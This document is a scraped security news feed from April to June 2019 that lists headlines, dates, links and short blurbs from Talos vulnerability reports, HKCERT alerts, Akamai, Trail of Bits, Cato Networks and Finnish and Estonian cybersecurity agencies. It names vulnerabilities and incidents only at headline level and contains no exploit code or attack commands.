https://www.akamai.com/blog/security/catch-me-if-you-can-evasive-and-defensive-techniques-in-phishing
In Conversation: New Starters
2019-06-12T04:00:00Z | 1560312000

The world is changing. At Akamai, we're proud to be part of the shift towards a more inclusive future. Where digital systems may replace human processes, we are determined to keep people at the center of our focus. After all,...

https://www.akamai.com/blog/culture/in-conversation-new-starters
Vulnerability in Exim email server exploited in data breaches
2019-06-10T13:18:45Z | 1560172725

A vulnerability has been discovered in Exim email server, which allows attackers to execute commands in the vulnerable system. The NCSC-FI has received several reports on data breaches in Finland where attackers have penetrated systems using the Exim vulnerability. The vulnerability is being actively exploited in other countries, too. In the incidents reported to the NCSC-FI, the attacker has hacked cPanel systems exploiting the vulnerability in Exim email server bundled with the cPanel software.

https://www.kyberturvallisuuskeskus.fi/en/vulnerability-exim-email-server-exploited-data-breaches
Schneider Electric Modicon M580 UMAS memory block write denial-of-service vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0767
Schneider Electric Modicon M580 UMAS write system bits and blocks denial-of-service vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0770
Schneider Electric Modicon M580 UnityPro reliance on untrusted inputs vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0743
Schneider Electric Modicon M580 UMAS read system blocks and bits information disclosure vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0769
Schneider Electric UnityPro PLC simulator remote code execution vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0771
Schneider Electric Modicon M580 UMAS Improper Authentication Vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0741
Schneider Electric Modicon M580 UMAS strategy read information disclosure vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0740
Schneider Electric Modicon M580 UMAS write system coils and holding registers denial-of-service vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0768
Schneider Electric Modicon M580 UMAS read memory block information disclosure vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0739
Schneider Electric Modicon M580 UMAS set breakpoint denial-of-service vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0766
Schneider Electric Modicon M580 UMAS memory block read denial-of-service vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0738
Schneider Electric Modicon M580 UMAS function code 0x65 denial-of-service vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0765
Schneider Electric Modicon M580 UMAS function code 0x28 denial-of-service vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0764
Schneider Electric Modicon M580 UMAS strategy transfer denial-of-service vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0737
Schneider Electric Modicon M580 UMAS function code 0x6d multiple denial-of-service vulnerabilities
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0763
Schneider Electric Modicon M580 UMAS release reservation denial-of-service vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0735
Schneider Electric Modicon M580 UMAS Read Memory Block Out Of Bounds Information Disclosure Vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0745
Schneider Electric Modicon M580 UMAS Strategy File Write Vulnerability
2019-06-10T00:00:00Z | 1560124800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0742
Announcing Manticore 0.3.0
2019-06-07T10:50:57Z | 1559904657

Earlier this week, Manticore leapt forward to version 0.3.0. Advances for our symbolic execution engine now include: “fast forwarding” through concrete execution that you don’t care about, support for Linux binaries statically compiled for AArch64, and an interface for selectively solving for interesting test cases. We’ve been working really hard on these and other features […]

https://blog.trailofbits.com/2019/06/07/announcing-manticore-0-3-0/
FIRST releases 2018-2019 Annual Report
2019-06-06T12:00:00Z | 1559822400

The Forum of Incident Response and Security Teams releases its third annual report, covering the scope of its activities from the 2018 conference in Kuala Lumpur, through its 2019 annual event in Edinburgh.

https://www.first.org/newsroom/releases/20190606
The Co-Managed SD-WAN: A Managed Infrastructure with Self-Service Capabilities for Agility
2019-06-06T06:58:30Z | 1559804310

SD-WAN certainly provides companies with a lot of flexibility, and one aspect of that flexibility is how to manage the networking solution. There are various management models that differ in the degree of responsibility assumed by the enterprise or its chosen service provider in terms of infrastructure maintenance, continuous monitoring, and change management. One management... The post The Co-Managed SD-WAN: A Managed Infrastructure with Self-Service Capabilities for Agility appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-co-managed-sd-wan-a-managed-infrastructure-with-self-service-capabilities-for-agility/
Identifying Vulnerabilities in Phishing Kits
2019-06-05T04:00:00Z | 1559707200

While recently examining hundreds of phishing kits for ongoing research, Akamai discovered something interesting - several of the kits included basic vulnerabilities due to flimsy construction or reliance on outdated open source code. Considering the impact phishing kits have on...

https://www.akamai.com/blog/security/identifying-vulnerabilities-in-phishing-kits
Jenkins Artifactory Plugin information disclosure vulnerability
2019-06-04T00:00:00Z | 1559606400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0787
Jenkins Artifactory Plugin fillCredentialsIdItems information disclosure vulnerability
2019-06-04T00:00:00Z | 1559606400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0846
Using osquery for remote forensics
2019-05-31T15:59:48Z | 1559318388

System administrators use osquery for endpoint telemetry and daily monitoring. Security threat hunters use it to find indicators of compromise on their systems. Now another audience is discovering osquery: forensic analysts. While osquery core is great for querying various system-level data remotely, forensics extensions will give it the ability to inspect to deeper-level data structures […]

https://blog.trailofbits.com/2019/05/31/using-osquery-for-remote-forensics/
Fuzzing Unit Tests with DeepState and Eclipser
2019-05-31T11:00:31Z | 1559300431

If unit tests are important to you, there’s now another reason to use DeepState, our Google-Test-like property-based testing tool for C and C++. It’s called Eclipser, a powerful new fuzzer very recently presented in an ICSE 2019 paper. We are proud to announce that Eclipser is now fully integrated into DeepState. Eclipser provides many of […]

https://blog.trailofbits.com/2019/05/31/fuzzing-unit-tests-with-deepstate-and-eclipser/
Uus eesti.ee postkasti turvastandard kaitseb kasutajaid paremini õngitsus- ja väljapressimiskirjade eest
2019-05-30T11:25:34Z | 1559215534

Eelmisel nädalal võttis RIA eesti.ee postkastis kasutusele DMARC turvastandardi, mis on esimese nädalaga peatanud rohkem kui 11 000 õngitsus- ja väljapressimiskirja jõudmise @eesti.ee aadressideni.

https://ria.ee/uudised/uus-eestiee-postkasti-turvastandard-kaitseb-kasutajaid-paremini-ongitsus-ja
Announcing Automated Reverse Engineering Trainings
2019-05-30T11:00:28Z | 1559214028

Consider our modular trainings. They can be organized to suit your company’s needs. You choose the number of skills and days to spend honing them.

https://blog.trailofbits.com/2019/05/30/announcing-automated-reverse-engineering-trainings/
Our Ceiling, Their Floor, Educating the Future
2019-05-29T04:00:00Z | 1559102400

Throughout this blog series, we've been discussing the future of tech in relation to our young people. At Akamai, our outreach programs and forward-thinking culture have positioned us as part of the movement determined to make the world better for...

https://www.akamai.com/blog/culture/our-ceiling-their-floor-educating-the-future
PaX read_kmem denial of service vulnerability
2019-05-29T00:00:00Z | 1559088000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0784
New Research Documents How Traditional Telco Services Cripple Digital Transformation
2019-05-28T09:49:13Z | 1559036953

How are digital business transformation projects impacting enterprise networks? To answer that question, we asked more than 1,600 IT professionals worldwide. The report, Telcos and the Future of the WAN in 2019 focuses on those 432 who purchase telco services for organizations with MPLS backbones.   Repeatedly we heard that SD-WAN continues to serve as the basis of their digital transformation efforts. No surprise there. What’s perhaps more interesting,... The post New Research Documents How Traditional Telco Services Cripple Digital Transformation appeared first on Cato Networks.

https://www.catonetworks.com/blog/new-research-documents-how-traditional-telco-services-cripple-digital-transformation/
Slither: The Leading Static Analyzer for Smart Contracts
2019-05-27T10:30:58Z | 1558953058

We have published an academic paper on Slither, our static analysis framework for smart contracts, in the International Workshop on Emerging Trends in Software Engineering for Blockchain (WETSEB), colocated with ICSE. Our paper shows that Slither’s bug detection outperforms other static analysis tools for finding issues in smart contracts in terms of speed, robustness, and […]

https://blog.trailofbits.com/2019/05/27/slither-the-leading-static-analyzer-for-smart-contracts/
Cato Managed Threat Detection and Response (MDR)
2019-05-27T08:39:52Z | 1558946392

The post Cato Managed Threat Detection and Response (MDR) appeared first on Cato Networks.

https://go.catonetworks.com/rs/245-RJK-441/images/Cato_Managed_Detection_and_Response-MDR-Service.pdf
Security Alert (A19-05-11): Multiple Vulnerabilities in Intel Products
2019-05-27T04:00:00Z | 1558929600

Intel has issued a security advisory to address multiple vulnerabilities in some Intel products.

https://www.govcert.gov.hk/en/alerts_detail.php
Inside Cato’s Intelligent Last-Mile Management Service
2019-05-23T18:32:17Z | 1558636337

The post Inside Cato’s Intelligent Last-Mile Management Service appeared first on Cato Networks.

https://go.catonetworks.com/rs/245-RJK-441/images/Intelligent_Last-Mile_Management.pdf
SD-WAN and UCaaS: How to Guarantee Your Win
2019-05-22T20:53:05Z | 1558558385

The post SD-WAN and UCaaS: How to Guarantee Your Win appeared first on Cato Networks.

https://www.catonetworks.com/resources/sd-wan-and-ucaas-how-to-guarantee-your-win/
How to Deliver Reliable, High-Performance WANs into the Asia Pacific and China
2019-05-22T10:48:52Z | 1558522132

The post How to Deliver Reliable, High-Performance WANs into the Asia Pacific and China appeared first on Cato Networks.

https://www.catonetworks.com/resources/how-to-deliver-reliable-high-performance-wans-into-the-asia-pacific-and-china/
SD-WAN migration: How to transition from MPLS to Cato Cloud in 6 steps
2019-05-22T10:45:46Z | 1558521946

The post SD-WAN migration: How to transition from MPLS to Cato Cloud in 6 steps appeared first on Cato Networks.

https://www.catonetworks.com/resources/how-to-migrate-from-mpls-to-cato-cloud
Secure Internet Access at the Branch
2019-05-22T07:47:13Z | 1558511233

The post Secure Internet Access at the Branch appeared first on Cato Networks.

https://www.catonetworks.com/resources/deliver-direct-internet-access-to-your-global-branches
Security Alert (A19-05-10): Multiple Vulnerabilities in Firefox
2019-05-22T04:00:00Z | 1558497600

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Optimized Remote Access with a Secure Access Service Edge
2019-05-21T15:23:34Z | 1558452214

The post Optimized Remote Access with a Secure Access Service Edge appeared first on Cato Networks.

https://www.catonetworks.com/resources/optimized-remote-access-with-a-secure-access-service-edge/
Cato Solution Brief
2019-05-21T15:19:03Z | 1558451943

The post Cato Solution Brief appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-solution-brief/
The New WAN: Why the Private Internet Will Replace MPLS
2019-05-21T15:15:36Z | 1558451736

The post The New WAN: Why the Private Internet Will Replace MPLS appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-new-wan-why-the-private-internet-will-replace-mpls/
The Internet is Broken
2019-05-21T15:14:05Z | 1558451645

The post The Internet is Broken appeared first on Cato Networks.

https://www.catonetworks.com/resources/why-public-internet-routing-sucks/
MPLS, SD-WANs, and the Promise of SD-WAN as a Service
2019-05-21T13:01:46Z | 1558443706

The post MPLS, SD-WANs, and the Promise of SD-WAN as a Service appeared first on Cato Networks.

https://www.catonetworks.com/resources/mpls-sdwan-and-the-promise-of-sd-wan-as-a-service/
16Shop: Commercial Phishing Kit Has A Hidden Backdoor
2019-05-21T04:00:00Z | 1558411200

Additional research by Or Katz When it comes to targeting Apple users and their personal and financial data, 16Shop has emerged as a go to kit for those who can afford it. While 16Shop is sold to criminals looking to...

https://www.akamai.com/blog/security/16shop-commercial-phishing-kit-has-a-hidden-backdoor
Preventing the Top Data Center Breaches
2019-05-20T11:26:00Z | 1558351560

Data center breaches can seem impossible to avoid, but good data center security can seriously reduce your risk. We look at famous breaches Equifax, Yahoo, & more.

https://www.akamai.com/blog/security/recent-data-center-breaches-and-prevention
Chris Gibson appointed Executive Director at FIRST
2019-05-17T09:00:00Z | 1558083600

The Forum of Incident Response and Security Teams (FIRST) today announced the appointment of Chris Gibson as Executive Director of FIRST.

https://www.first.org/newsroom/releases/20190517
Cato Networks Advanced Security Services
2019-05-16T15:03:50Z | 1558019030

The post Cato Networks Advanced Security Services appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-networks-advanced-security-services/
How to Migrate from MPLS to SD-WAN
2019-05-16T15:03:03Z | 1558018983

The post How to Migrate from MPLS to SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/resources/how-to-migrate-from-mpls-to-sd-wan/
Security Alert (A19-05-09): Multiple Vulnerabilities in Intel Products
2019-05-16T04:00:00Z | 1557979200

Intel has recently disclosed a new group of vulnerabilities collectively known as Microarchitectural Data Sampling (MDS) affecting some Intel processors.

https://www.govcert.gov.hk/en/alerts_detail.php
Wacom update helper tool start/stopLaunchDProcess privilege escalation vulnerability
2019-05-16T00:00:00Z | 1557964800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0761
Wacom update helper tool startProcess privilege escalation vulnerability
2019-05-16T00:00:00Z | 1557964800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0760
Cato Networks State of the Business
2019-05-15T09:17:04Z | 1557911824

The post Cato Networks State of the Business appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-networks-state-of-the-business/
High Threat Security Alert (A19-05-07): Multiple Vulnerabilities in Microsoft Products (May 2019)
2019-05-15T04:00:00Z | 1557892800

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-05-08): Multiple Vulnerabilities in Adobe Flash Player and Adobe Reader/Acrobat
2019-05-15T04:00:00Z | 1557892800

Security updates are released for Adobe Flash Player and Adobe Reader/Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Bots Tampering with TLS to Avoid Detection
2019-05-15T04:00:00Z | 1557892800

Researchers at Akamai observed attackers using a novel approach for evading detection. This new technique - which we call Cipher Stunting - has become a growing threat, with its roots tracing back to early-2018. By using advanced methods, attackers are...

https://www.akamai.com/blog/security/bots-tampering-with-tls-to-avoid-detection
Containers vs Virtual Machines ? Your Cheat Sheet to Know the Differences
2019-05-14T18:56:00Z | 1557860160

Containers vs virtual machines is an ongoing debate in many IT shops around the world. Learn what makes each unique, their common use cases, and how to keep both secure.

https://www.akamai.com/blog/security/containers-vs-virtual-machines-cheat-sheet
Cyber weather in April: threat of ransomware attacks in the air
2019-05-14T05:04:07Z | 1557810247

The Finnish cyber weather in April was marred by already familiar Office 365 credential phishing and related scams. Internationally, the ‘Big Game Hunting’ phenomenon, which means ransomware attacks targeted at large organisations, covered the sky with grey clouds.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-weather-april-threat-ransomware-attacks-air
Cyber weather in April: threat of ransomware attacks in the air
2019-05-14T05:04:07Z | 1557810247

The Finnish cyber weather in April was marred by already familiar Office 365 credential phishing and related scams. Internationally, the ‘Big Game Hunting’ phenomenon, which means ransomware attacks targeted at large organisations, covered the sky with grey clouds.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-weather-april-threat-ransomware-attacks-air
Security Alert (A19-05-04): Multiple Vulnerabilities in Cisco Products
2019-05-14T04:00:00Z | 1557806400

Cisco released security advisories to address the vulnerabilities in Cisco IOS XE software and the implementation of the hardware-based Secure Boot.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-05-05): Multiple Vulnerabilities in Apple iOS
2019-05-14T04:00:00Z | 1557806400

Apple has released a security update in its latest iOS version 12.3 to fix 40 vulnerabilities identified in various iOS devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-05-06): Vulnerability in WhatsApp leading to spyware attacks on mobile devices
2019-05-14T04:00:00Z | 1557806400

A security vulnerability has been identified in WhatsApp which would allow a remote attacker to install malicious code such as spyware, on a targeted mobile device by making a WhatsApp call.

https://www.govcert.gov.hk/en/alerts_detail.php
Antenna House Rainbow PDF Office server document converter TxMasterStyleAtom parsing code execution vulnerability
2019-05-14T00:00:00Z | 1557792000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0792
Adobe Acrobat Reader DC OCGs state change remote code execution vulnerability
2019-05-14T00:00:00Z | 1557792000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0778
Adobe Acrobat Reader DC app.thermometer Remote Code Execution Vulnerability
2019-05-14T00:00:00Z | 1557792000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0796
Words of Wisdom: Advice for Pursuing a Career in Tech
2019-05-13T04:00:00Z | 1557720000

The introduction of AI into the workplace is creating uncertainty over the future of employment. However, research shows that tech will create "133 million" more jobs before 2022 than it will dissolve, as "new entities in the economy replace obsolete...

https://www.akamai.com/blog/culture/words-of-wisdom-advice-for-pursuing-a-career-in-tech
Novatek NT9665X XML_GetScreen Strncmp denial-of-service vulnerability
2019-05-13T00:00:00Z | 1557705600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0698
Novatek NT9665X XML_UploadFile path overflow code execution vulnerability
2019-05-13T00:00:00Z | 1557705600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0695
Novatek NT9665X HFS Recv buffer overflow code execution vulnerability
2019-05-13T00:00:00Z | 1557705600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0701
Anker Roav A1 Dashcam WifiCmd 9999 Code Execution Vulnerability
2019-05-13T00:00:00Z | 1557705600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0685
Anker Roav A1 Dashcam Wifi AP Default Credential Vulnerability
2019-05-13T00:00:00Z | 1557705600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0688
Novatek NT9665X XML_GetThumbNail denial-of-service vulnerability
2019-05-13T00:00:00Z | 1557705600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0696
Anker Roav A1 Dashcam HTTP Path Overflow Code Execution Vulnerability
2019-05-13T00:00:00Z | 1557705600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0687
Novatek NT9665X XML_GetRawEncJpg denial-of-service vulnerability
2019-05-13T00:00:00Z | 1557705600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0697
Novatek NT9665X HFS Overwrite denial-of-service vulnerability
2019-05-13T00:00:00Z | 1557705600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0700
Novatek NT9665X XML_UploadFile WifiCmd denial-of-service vulnerability
2019-05-13T00:00:00Z | 1557705600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0699
Novatek NT9665X HTTP Upload Firmware Update Vulnerability
2019-05-13T00:00:00Z | 1557705600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0689
Security Alert (A19-05-03): Vulnerability in Drupal
2019-05-09T04:00:00Z | 1557374400

Drupal released security update to fix the vulnerability in Phar Stream Wrapper package which are included in the Drupal core.

https://www.govcert.gov.hk/en/alerts_detail.php
Sqlite3 Window Function Remote Code Execution Vulnerability
2019-05-09T00:00:00Z | 1557360000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0777
Deployment Diversity for DNS Resiliency
2019-05-08T04:00:00Z | 1557288000

Similar to diverse workforces performing at a higher level, diverse network service deployments perform at a higher level that is increasingly important as the Internet continues to augment our reality. Akamai has 20 years of edge service deployment experience. Akamai's Intelligent Edge has proven that the "edge" requires more than "servers" on the edge. Fast, intelligent, and secure edge services require a mix of approaches, principles, and designs that start with DNS in mind.

https://www.akamai.com/blog/security/deployment-diversity-for-dns-resiliency
Winco Fireworks FireFly Bluetooth Low Energy Improper Access Control Vulnerability
2019-05-08T00:00:00Z | 1557273600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0772
Alpine Linux Docker Image root User Hard-Coded Credential Vulnerability
2019-05-08T00:00:00Z | 1557273600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0782
Understanding Software as a Service (SaaS) security
2019-05-07T15:25:34Z | 1557242734

An outline of the NCSC's approach to understanding the security of Software as a Service (SaaS) offerings.

https://www.ncsc.gov.uk/guidance/understanding-software-service-saas-security
How SD-WAN Overcomes Last Mile Constraints
2019-05-07T06:22:44Z | 1557210164

As more businesses require 24/7 uptime of their networks, they can’t afford to “put all their eggs in one basket.” Even MPLS with it’s vaunted “5 9s” SLA, has struggled with last-mile availability. SD-WAN offers a way forward that significantly improves last-mile uptime without appreciably increasing costs. Early Attempts To Solve The Problem Initial efforts... The post How SD-WAN Overcomes Last Mile Constraints appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-sd-wan-overcomes-last-mile-constraints/
What to Consider Before Renewing Your MPLS Contract
2019-05-06T07:10:23Z | 1557126623

The post What to Consider Before Renewing Your MPLS Contract appeared first on Cato Networks.

https://www.catonetworks.com/resources/what-to-consider-before-renewing-your-mpls-contract/
Jenkins GitLab Plugin Information Disclosure Vulnerability
2019-05-06T00:00:00Z | 1557100800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0788
Jenkins Ansible Tower Plugin information disclosure vulnerability
2019-05-06T00:00:00Z | 1557100800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0786
Jenkins Swarm Plugin XML external entities information disclosure vulnerability
2019-05-06T00:00:00Z | 1557100800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0783
Küberõppusel on ohus Eesti energiajulgeolek
2019-05-02T10:16:13Z | 1556792173

2.–3. mail korraldab Riigi Infosüsteemi Amet (RIA), Kaitseliidu küberkaitseüksus ja Kaitseväe küberväejuhatus ühes energeetika ettevõtetega Kevadtormi osana küberõppuse. Kübertormi stsenaariumi järgi tuleb lahendada hädaolukord, mille põhjustas elektrialajaamast leitud seade, mis tekitab energeetika ettevõtete süsteemidesse ohtlikud tagauksed ja anomaaliad.

https://ria.ee/uudised/kuberoppusel-ohus-eesti-energiajulgeolek
Security Alert (A19-05-01): Multiple Vulnerabilities in Cisco Products
2019-05-02T04:00:00Z | 1556769600

Cisco released security advisories to address the vulnerabilities in Cisco ASA software and Cisco FTD software.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A19-05-02): Multiple Vulnerabilities in Dell SupportAssist Client
2019-05-02T04:00:00Z | 1556769600

Dell released a security update to address multiple vulnerabilities in Dell SupportAssist Client installed on some Dell devices. The researcher who discovered the remote code execution vulnerability has recently released the proof-of-concept but fully workable exploit code on the Internet.

https://www.govcert.gov.hk/en/alerts_detail.php
Koodivaramu muudab riigile loodud tarkvaralahenduste lähtekoodi vabalt kättesaadavaks
2019-04-26T08:04:39Z | 1556265879

Majandus- ja Kommunikatsiooniministeerium ja Riigi Infosüsteemi Amet said valmis esmase versiooni e-riigi koodivaramust, mis muudab riigile loodud koodi ja tarkvaralahendused vabalt kättesaadavaks ja taaskasutatavaks.

https://ria.ee/uudised/koodivaramu-muudab-riigile-loodud-tarkvaralahenduste-lahtekoodi-vabalt-kattesaadavaks
Security Alert (A19-04-08): Multiple Vulnerabilities in ISC BIND
2019-04-25T04:00:00Z | 1556164800

Multiple vulnerabilities were found in nxdomain-redirect feature and simultaneous TCP connections limit of the ISC BIND software.

https://www.govcert.gov.hk/en/alerts_detail.php
Sierra Wireless AirLink ES450 SNMPD hard-coded credentials vulnerability
2019-04-25T00:00:00Z | 1556150400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0747
Sierra Wireless AirLink ES450 ACEManager Information Exposure Vulnerability
2019-04-25T00:00:00Z | 1556150400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0754
Sierra Wireless AirLink ES450 ACEManager ping_result.cgi Cross-Site Scripting Vulnerability
2019-04-25T00:00:00Z | 1556150400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0750
Sierra Wireless AirLink ES450 ACEManager upload.cgi Unverified Password Change Vulnerability
2019-04-25T00:00:00Z | 1556150400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0749
Sierra Wireless AirLink ES450 ACEManager Information Disclosure Vulnerability
2019-04-25T00:00:00Z | 1556150400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0753
Sierra Wireless AirLink ES450 ACEManager upload.cgi Remote Code Execution Vulnerability
2019-04-25T00:00:00Z | 1556150400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0748
Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Set_Task.cgi Permission Assignment Vulnerability
2019-04-25T00:00:00Z | 1556150400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0756
Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Get_Task.cgi Information Disclosure Vulnerability
2019-04-25T00:00:00Z | 1556150400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0755
Sierra Wireless AirLink ES450 ACEManager Cross-Site Request Forgery Vulnerability
2019-04-25T00:00:00Z | 1556150400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0751
Sierra Wireless AirLink ES450 ACEManager iplogging.cgi command injection vulnerability
2019-04-25T00:00:00Z | 1556150400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0746
Sierra Wireless AirLink ES450 ACEManager template_load.cgi Information Disclosure Vulnerability
2019-04-25T00:00:00Z | 1556150400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0752
The Problem with Perfection: Tech Confidence in Young Girls
2019-04-24T04:00:00Z | 1556078400

At Akamai, we believe the future of tech is full of amazing opportunities. However, to ensure these opportunities are fulfilled, some things in the industry need to change. To enable these changes, we are committed to providing opportunities to anyone...

https://www.akamai.com/blog/culture/the-problem-with-perfection-tech-confidence-in-young-girls
NFV is Out of Sync with the Cloud-Native Movement. Here’s a Solution
2019-04-23T11:01:00Z | 1556017260

Like many other telecommunications companies that provide networking services, the Canadian national telco company Telus has ambitious goals for network functions virtualization (NFV) and digital transformation. However, at the Digital World Transformation 2018 event last year, Telus CTO Ibrahim Gedeon voiced his opinion that network functions virtualization (NFV) had yet to live up to the... The post NFV is Out of Sync with the Cloud-Native Movement. Here’s a Solution appeared first on Cato Networks.

https://www.catonetworks.com/blog/nfv-is-out-of-sync-with-the-cloud-native-movement-heres-a-solution/
High Threat Security Alert (A19-04-07): Vulnerability in Oracle WebLogic Server
2019-04-23T04:00:00Z | 1555992000

Security researchers discovered a remote code execution vulnerability in wls9_async and wls-wsat components, which are included in the Oracle WebLogic Server. Reports indicated that proof-of-concept code is publicly available. Users are advised to take immediate action to patch your affected systems to mitigate the elevated risk of cyber attacks.

https://www.govcert.gov.hk/en/alerts_detail.php
Symantec Endpoint Protection Small Business Edition ccSetx86.sys 0x224844 kernel memory information disclosure vulnerability
2019-04-23T00:00:00Z | 1555977600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0693
Announcing the community-oriented osquery fork, osql
2019-04-18T16:24:51Z | 1555604691

For months, Facebook has been heavily refactoring the entire osquery codebase, migrating osquery away from standard development tools like CMake and integrating it with Facebook’s internal tooling. Their intention was to improve code quality, implement additional tests, and move the project to a more modular architecture. In practice, the changes sacrificed support for a number […]

https://blog.trailofbits.com/2019/04/18/announcing-the-community-oriented-osquery-fork-osql/
How SD-WAN Provided an Alternative to MPLS – A Case Study
2019-04-18T13:11:46Z | 1555593106

What’s transitioning like to SD-WAN? Ask Nick Dell. The IT manager at a leading automotive components manufacturer recently shared his experience transitioning his company from MPLS to Cato SD-WAN. During the webinar, we spoke about the reasons behind the decision, the differences between carrier-managed SD-WAN services and cloud-based SD-WAN, and insights he gained from his... The post How SD-WAN Provided an Alternative to MPLS – A Case Study appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-sd-wan-provided-an-alternative-to-mpls-a-case-study/
Security Alert (A19-04-06): Multiple Vulnerabilities in Drupal
2019-04-18T04:00:00Z | 1555560000

Drupal released security updates to fix the vulnerabilities in jQuery and Symfony libraries which are included in the Drupal core.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-04-05): Multiple Vulnerabilities in Oracle Java and Oracle Products (April 2019)
2019-04-17T04:00:00Z | 1555473600

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
4 Real World Challenges in Enterprise Networking & How SD-WAN Can Solve Them
2019-04-16T08:32:24Z | 1555403544

Even though an enterprise network is considered the lifeline of an organization, there are certain challenges that have limited the efficiency of the enterprise networks. Malware threats, limited data replication performance, network availability, sluggish network connectivity  — all are challenges that can have an immediate impact on the business. Here’s how to address them. 1.... The post 4 Real World Challenges in Enterprise Networking & How SD-WAN Can Solve Them appeared first on Cato Networks.

https://www.catonetworks.com/blog/4-real-world-challenges-in-enterprise-networking-how-sd-wan-can-solve-them/
Late frost in March cyber weather
2019-04-15T12:27:57Z | 1555331277

Cyber weather in March took a turn for the worse with major data breaches and active phishing campaigns. Even though solid network performance tried to chase the clouds away, the threat of DoS attacks during elections kept the sky dark. Documentary series Team Whack explaining the cyber world to viewers was a ray of light in the gloomy season.

https://www.kyberturvallisuuskeskus.fi/en/news/late-frost-march-cyber-weather
Late frost in March cyber weather
2019-04-15T12:27:57Z | 1555331277

Cyber weather in March took a turn for the worse with major data breaches and active phishing campaigns. Even though solid network performance tried to chase the clouds away, the threat of DoS attacks during elections kept the sky dark. Documentary series Team Whack explaining the cyber world to viewers was a ray of light in the gloomy season.

https://www.kyberturvallisuuskeskus.fi/en/news/late-frost-march-cyber-weather
Security Alert (A19-04-04): Vulnerability in Apache Tomcat
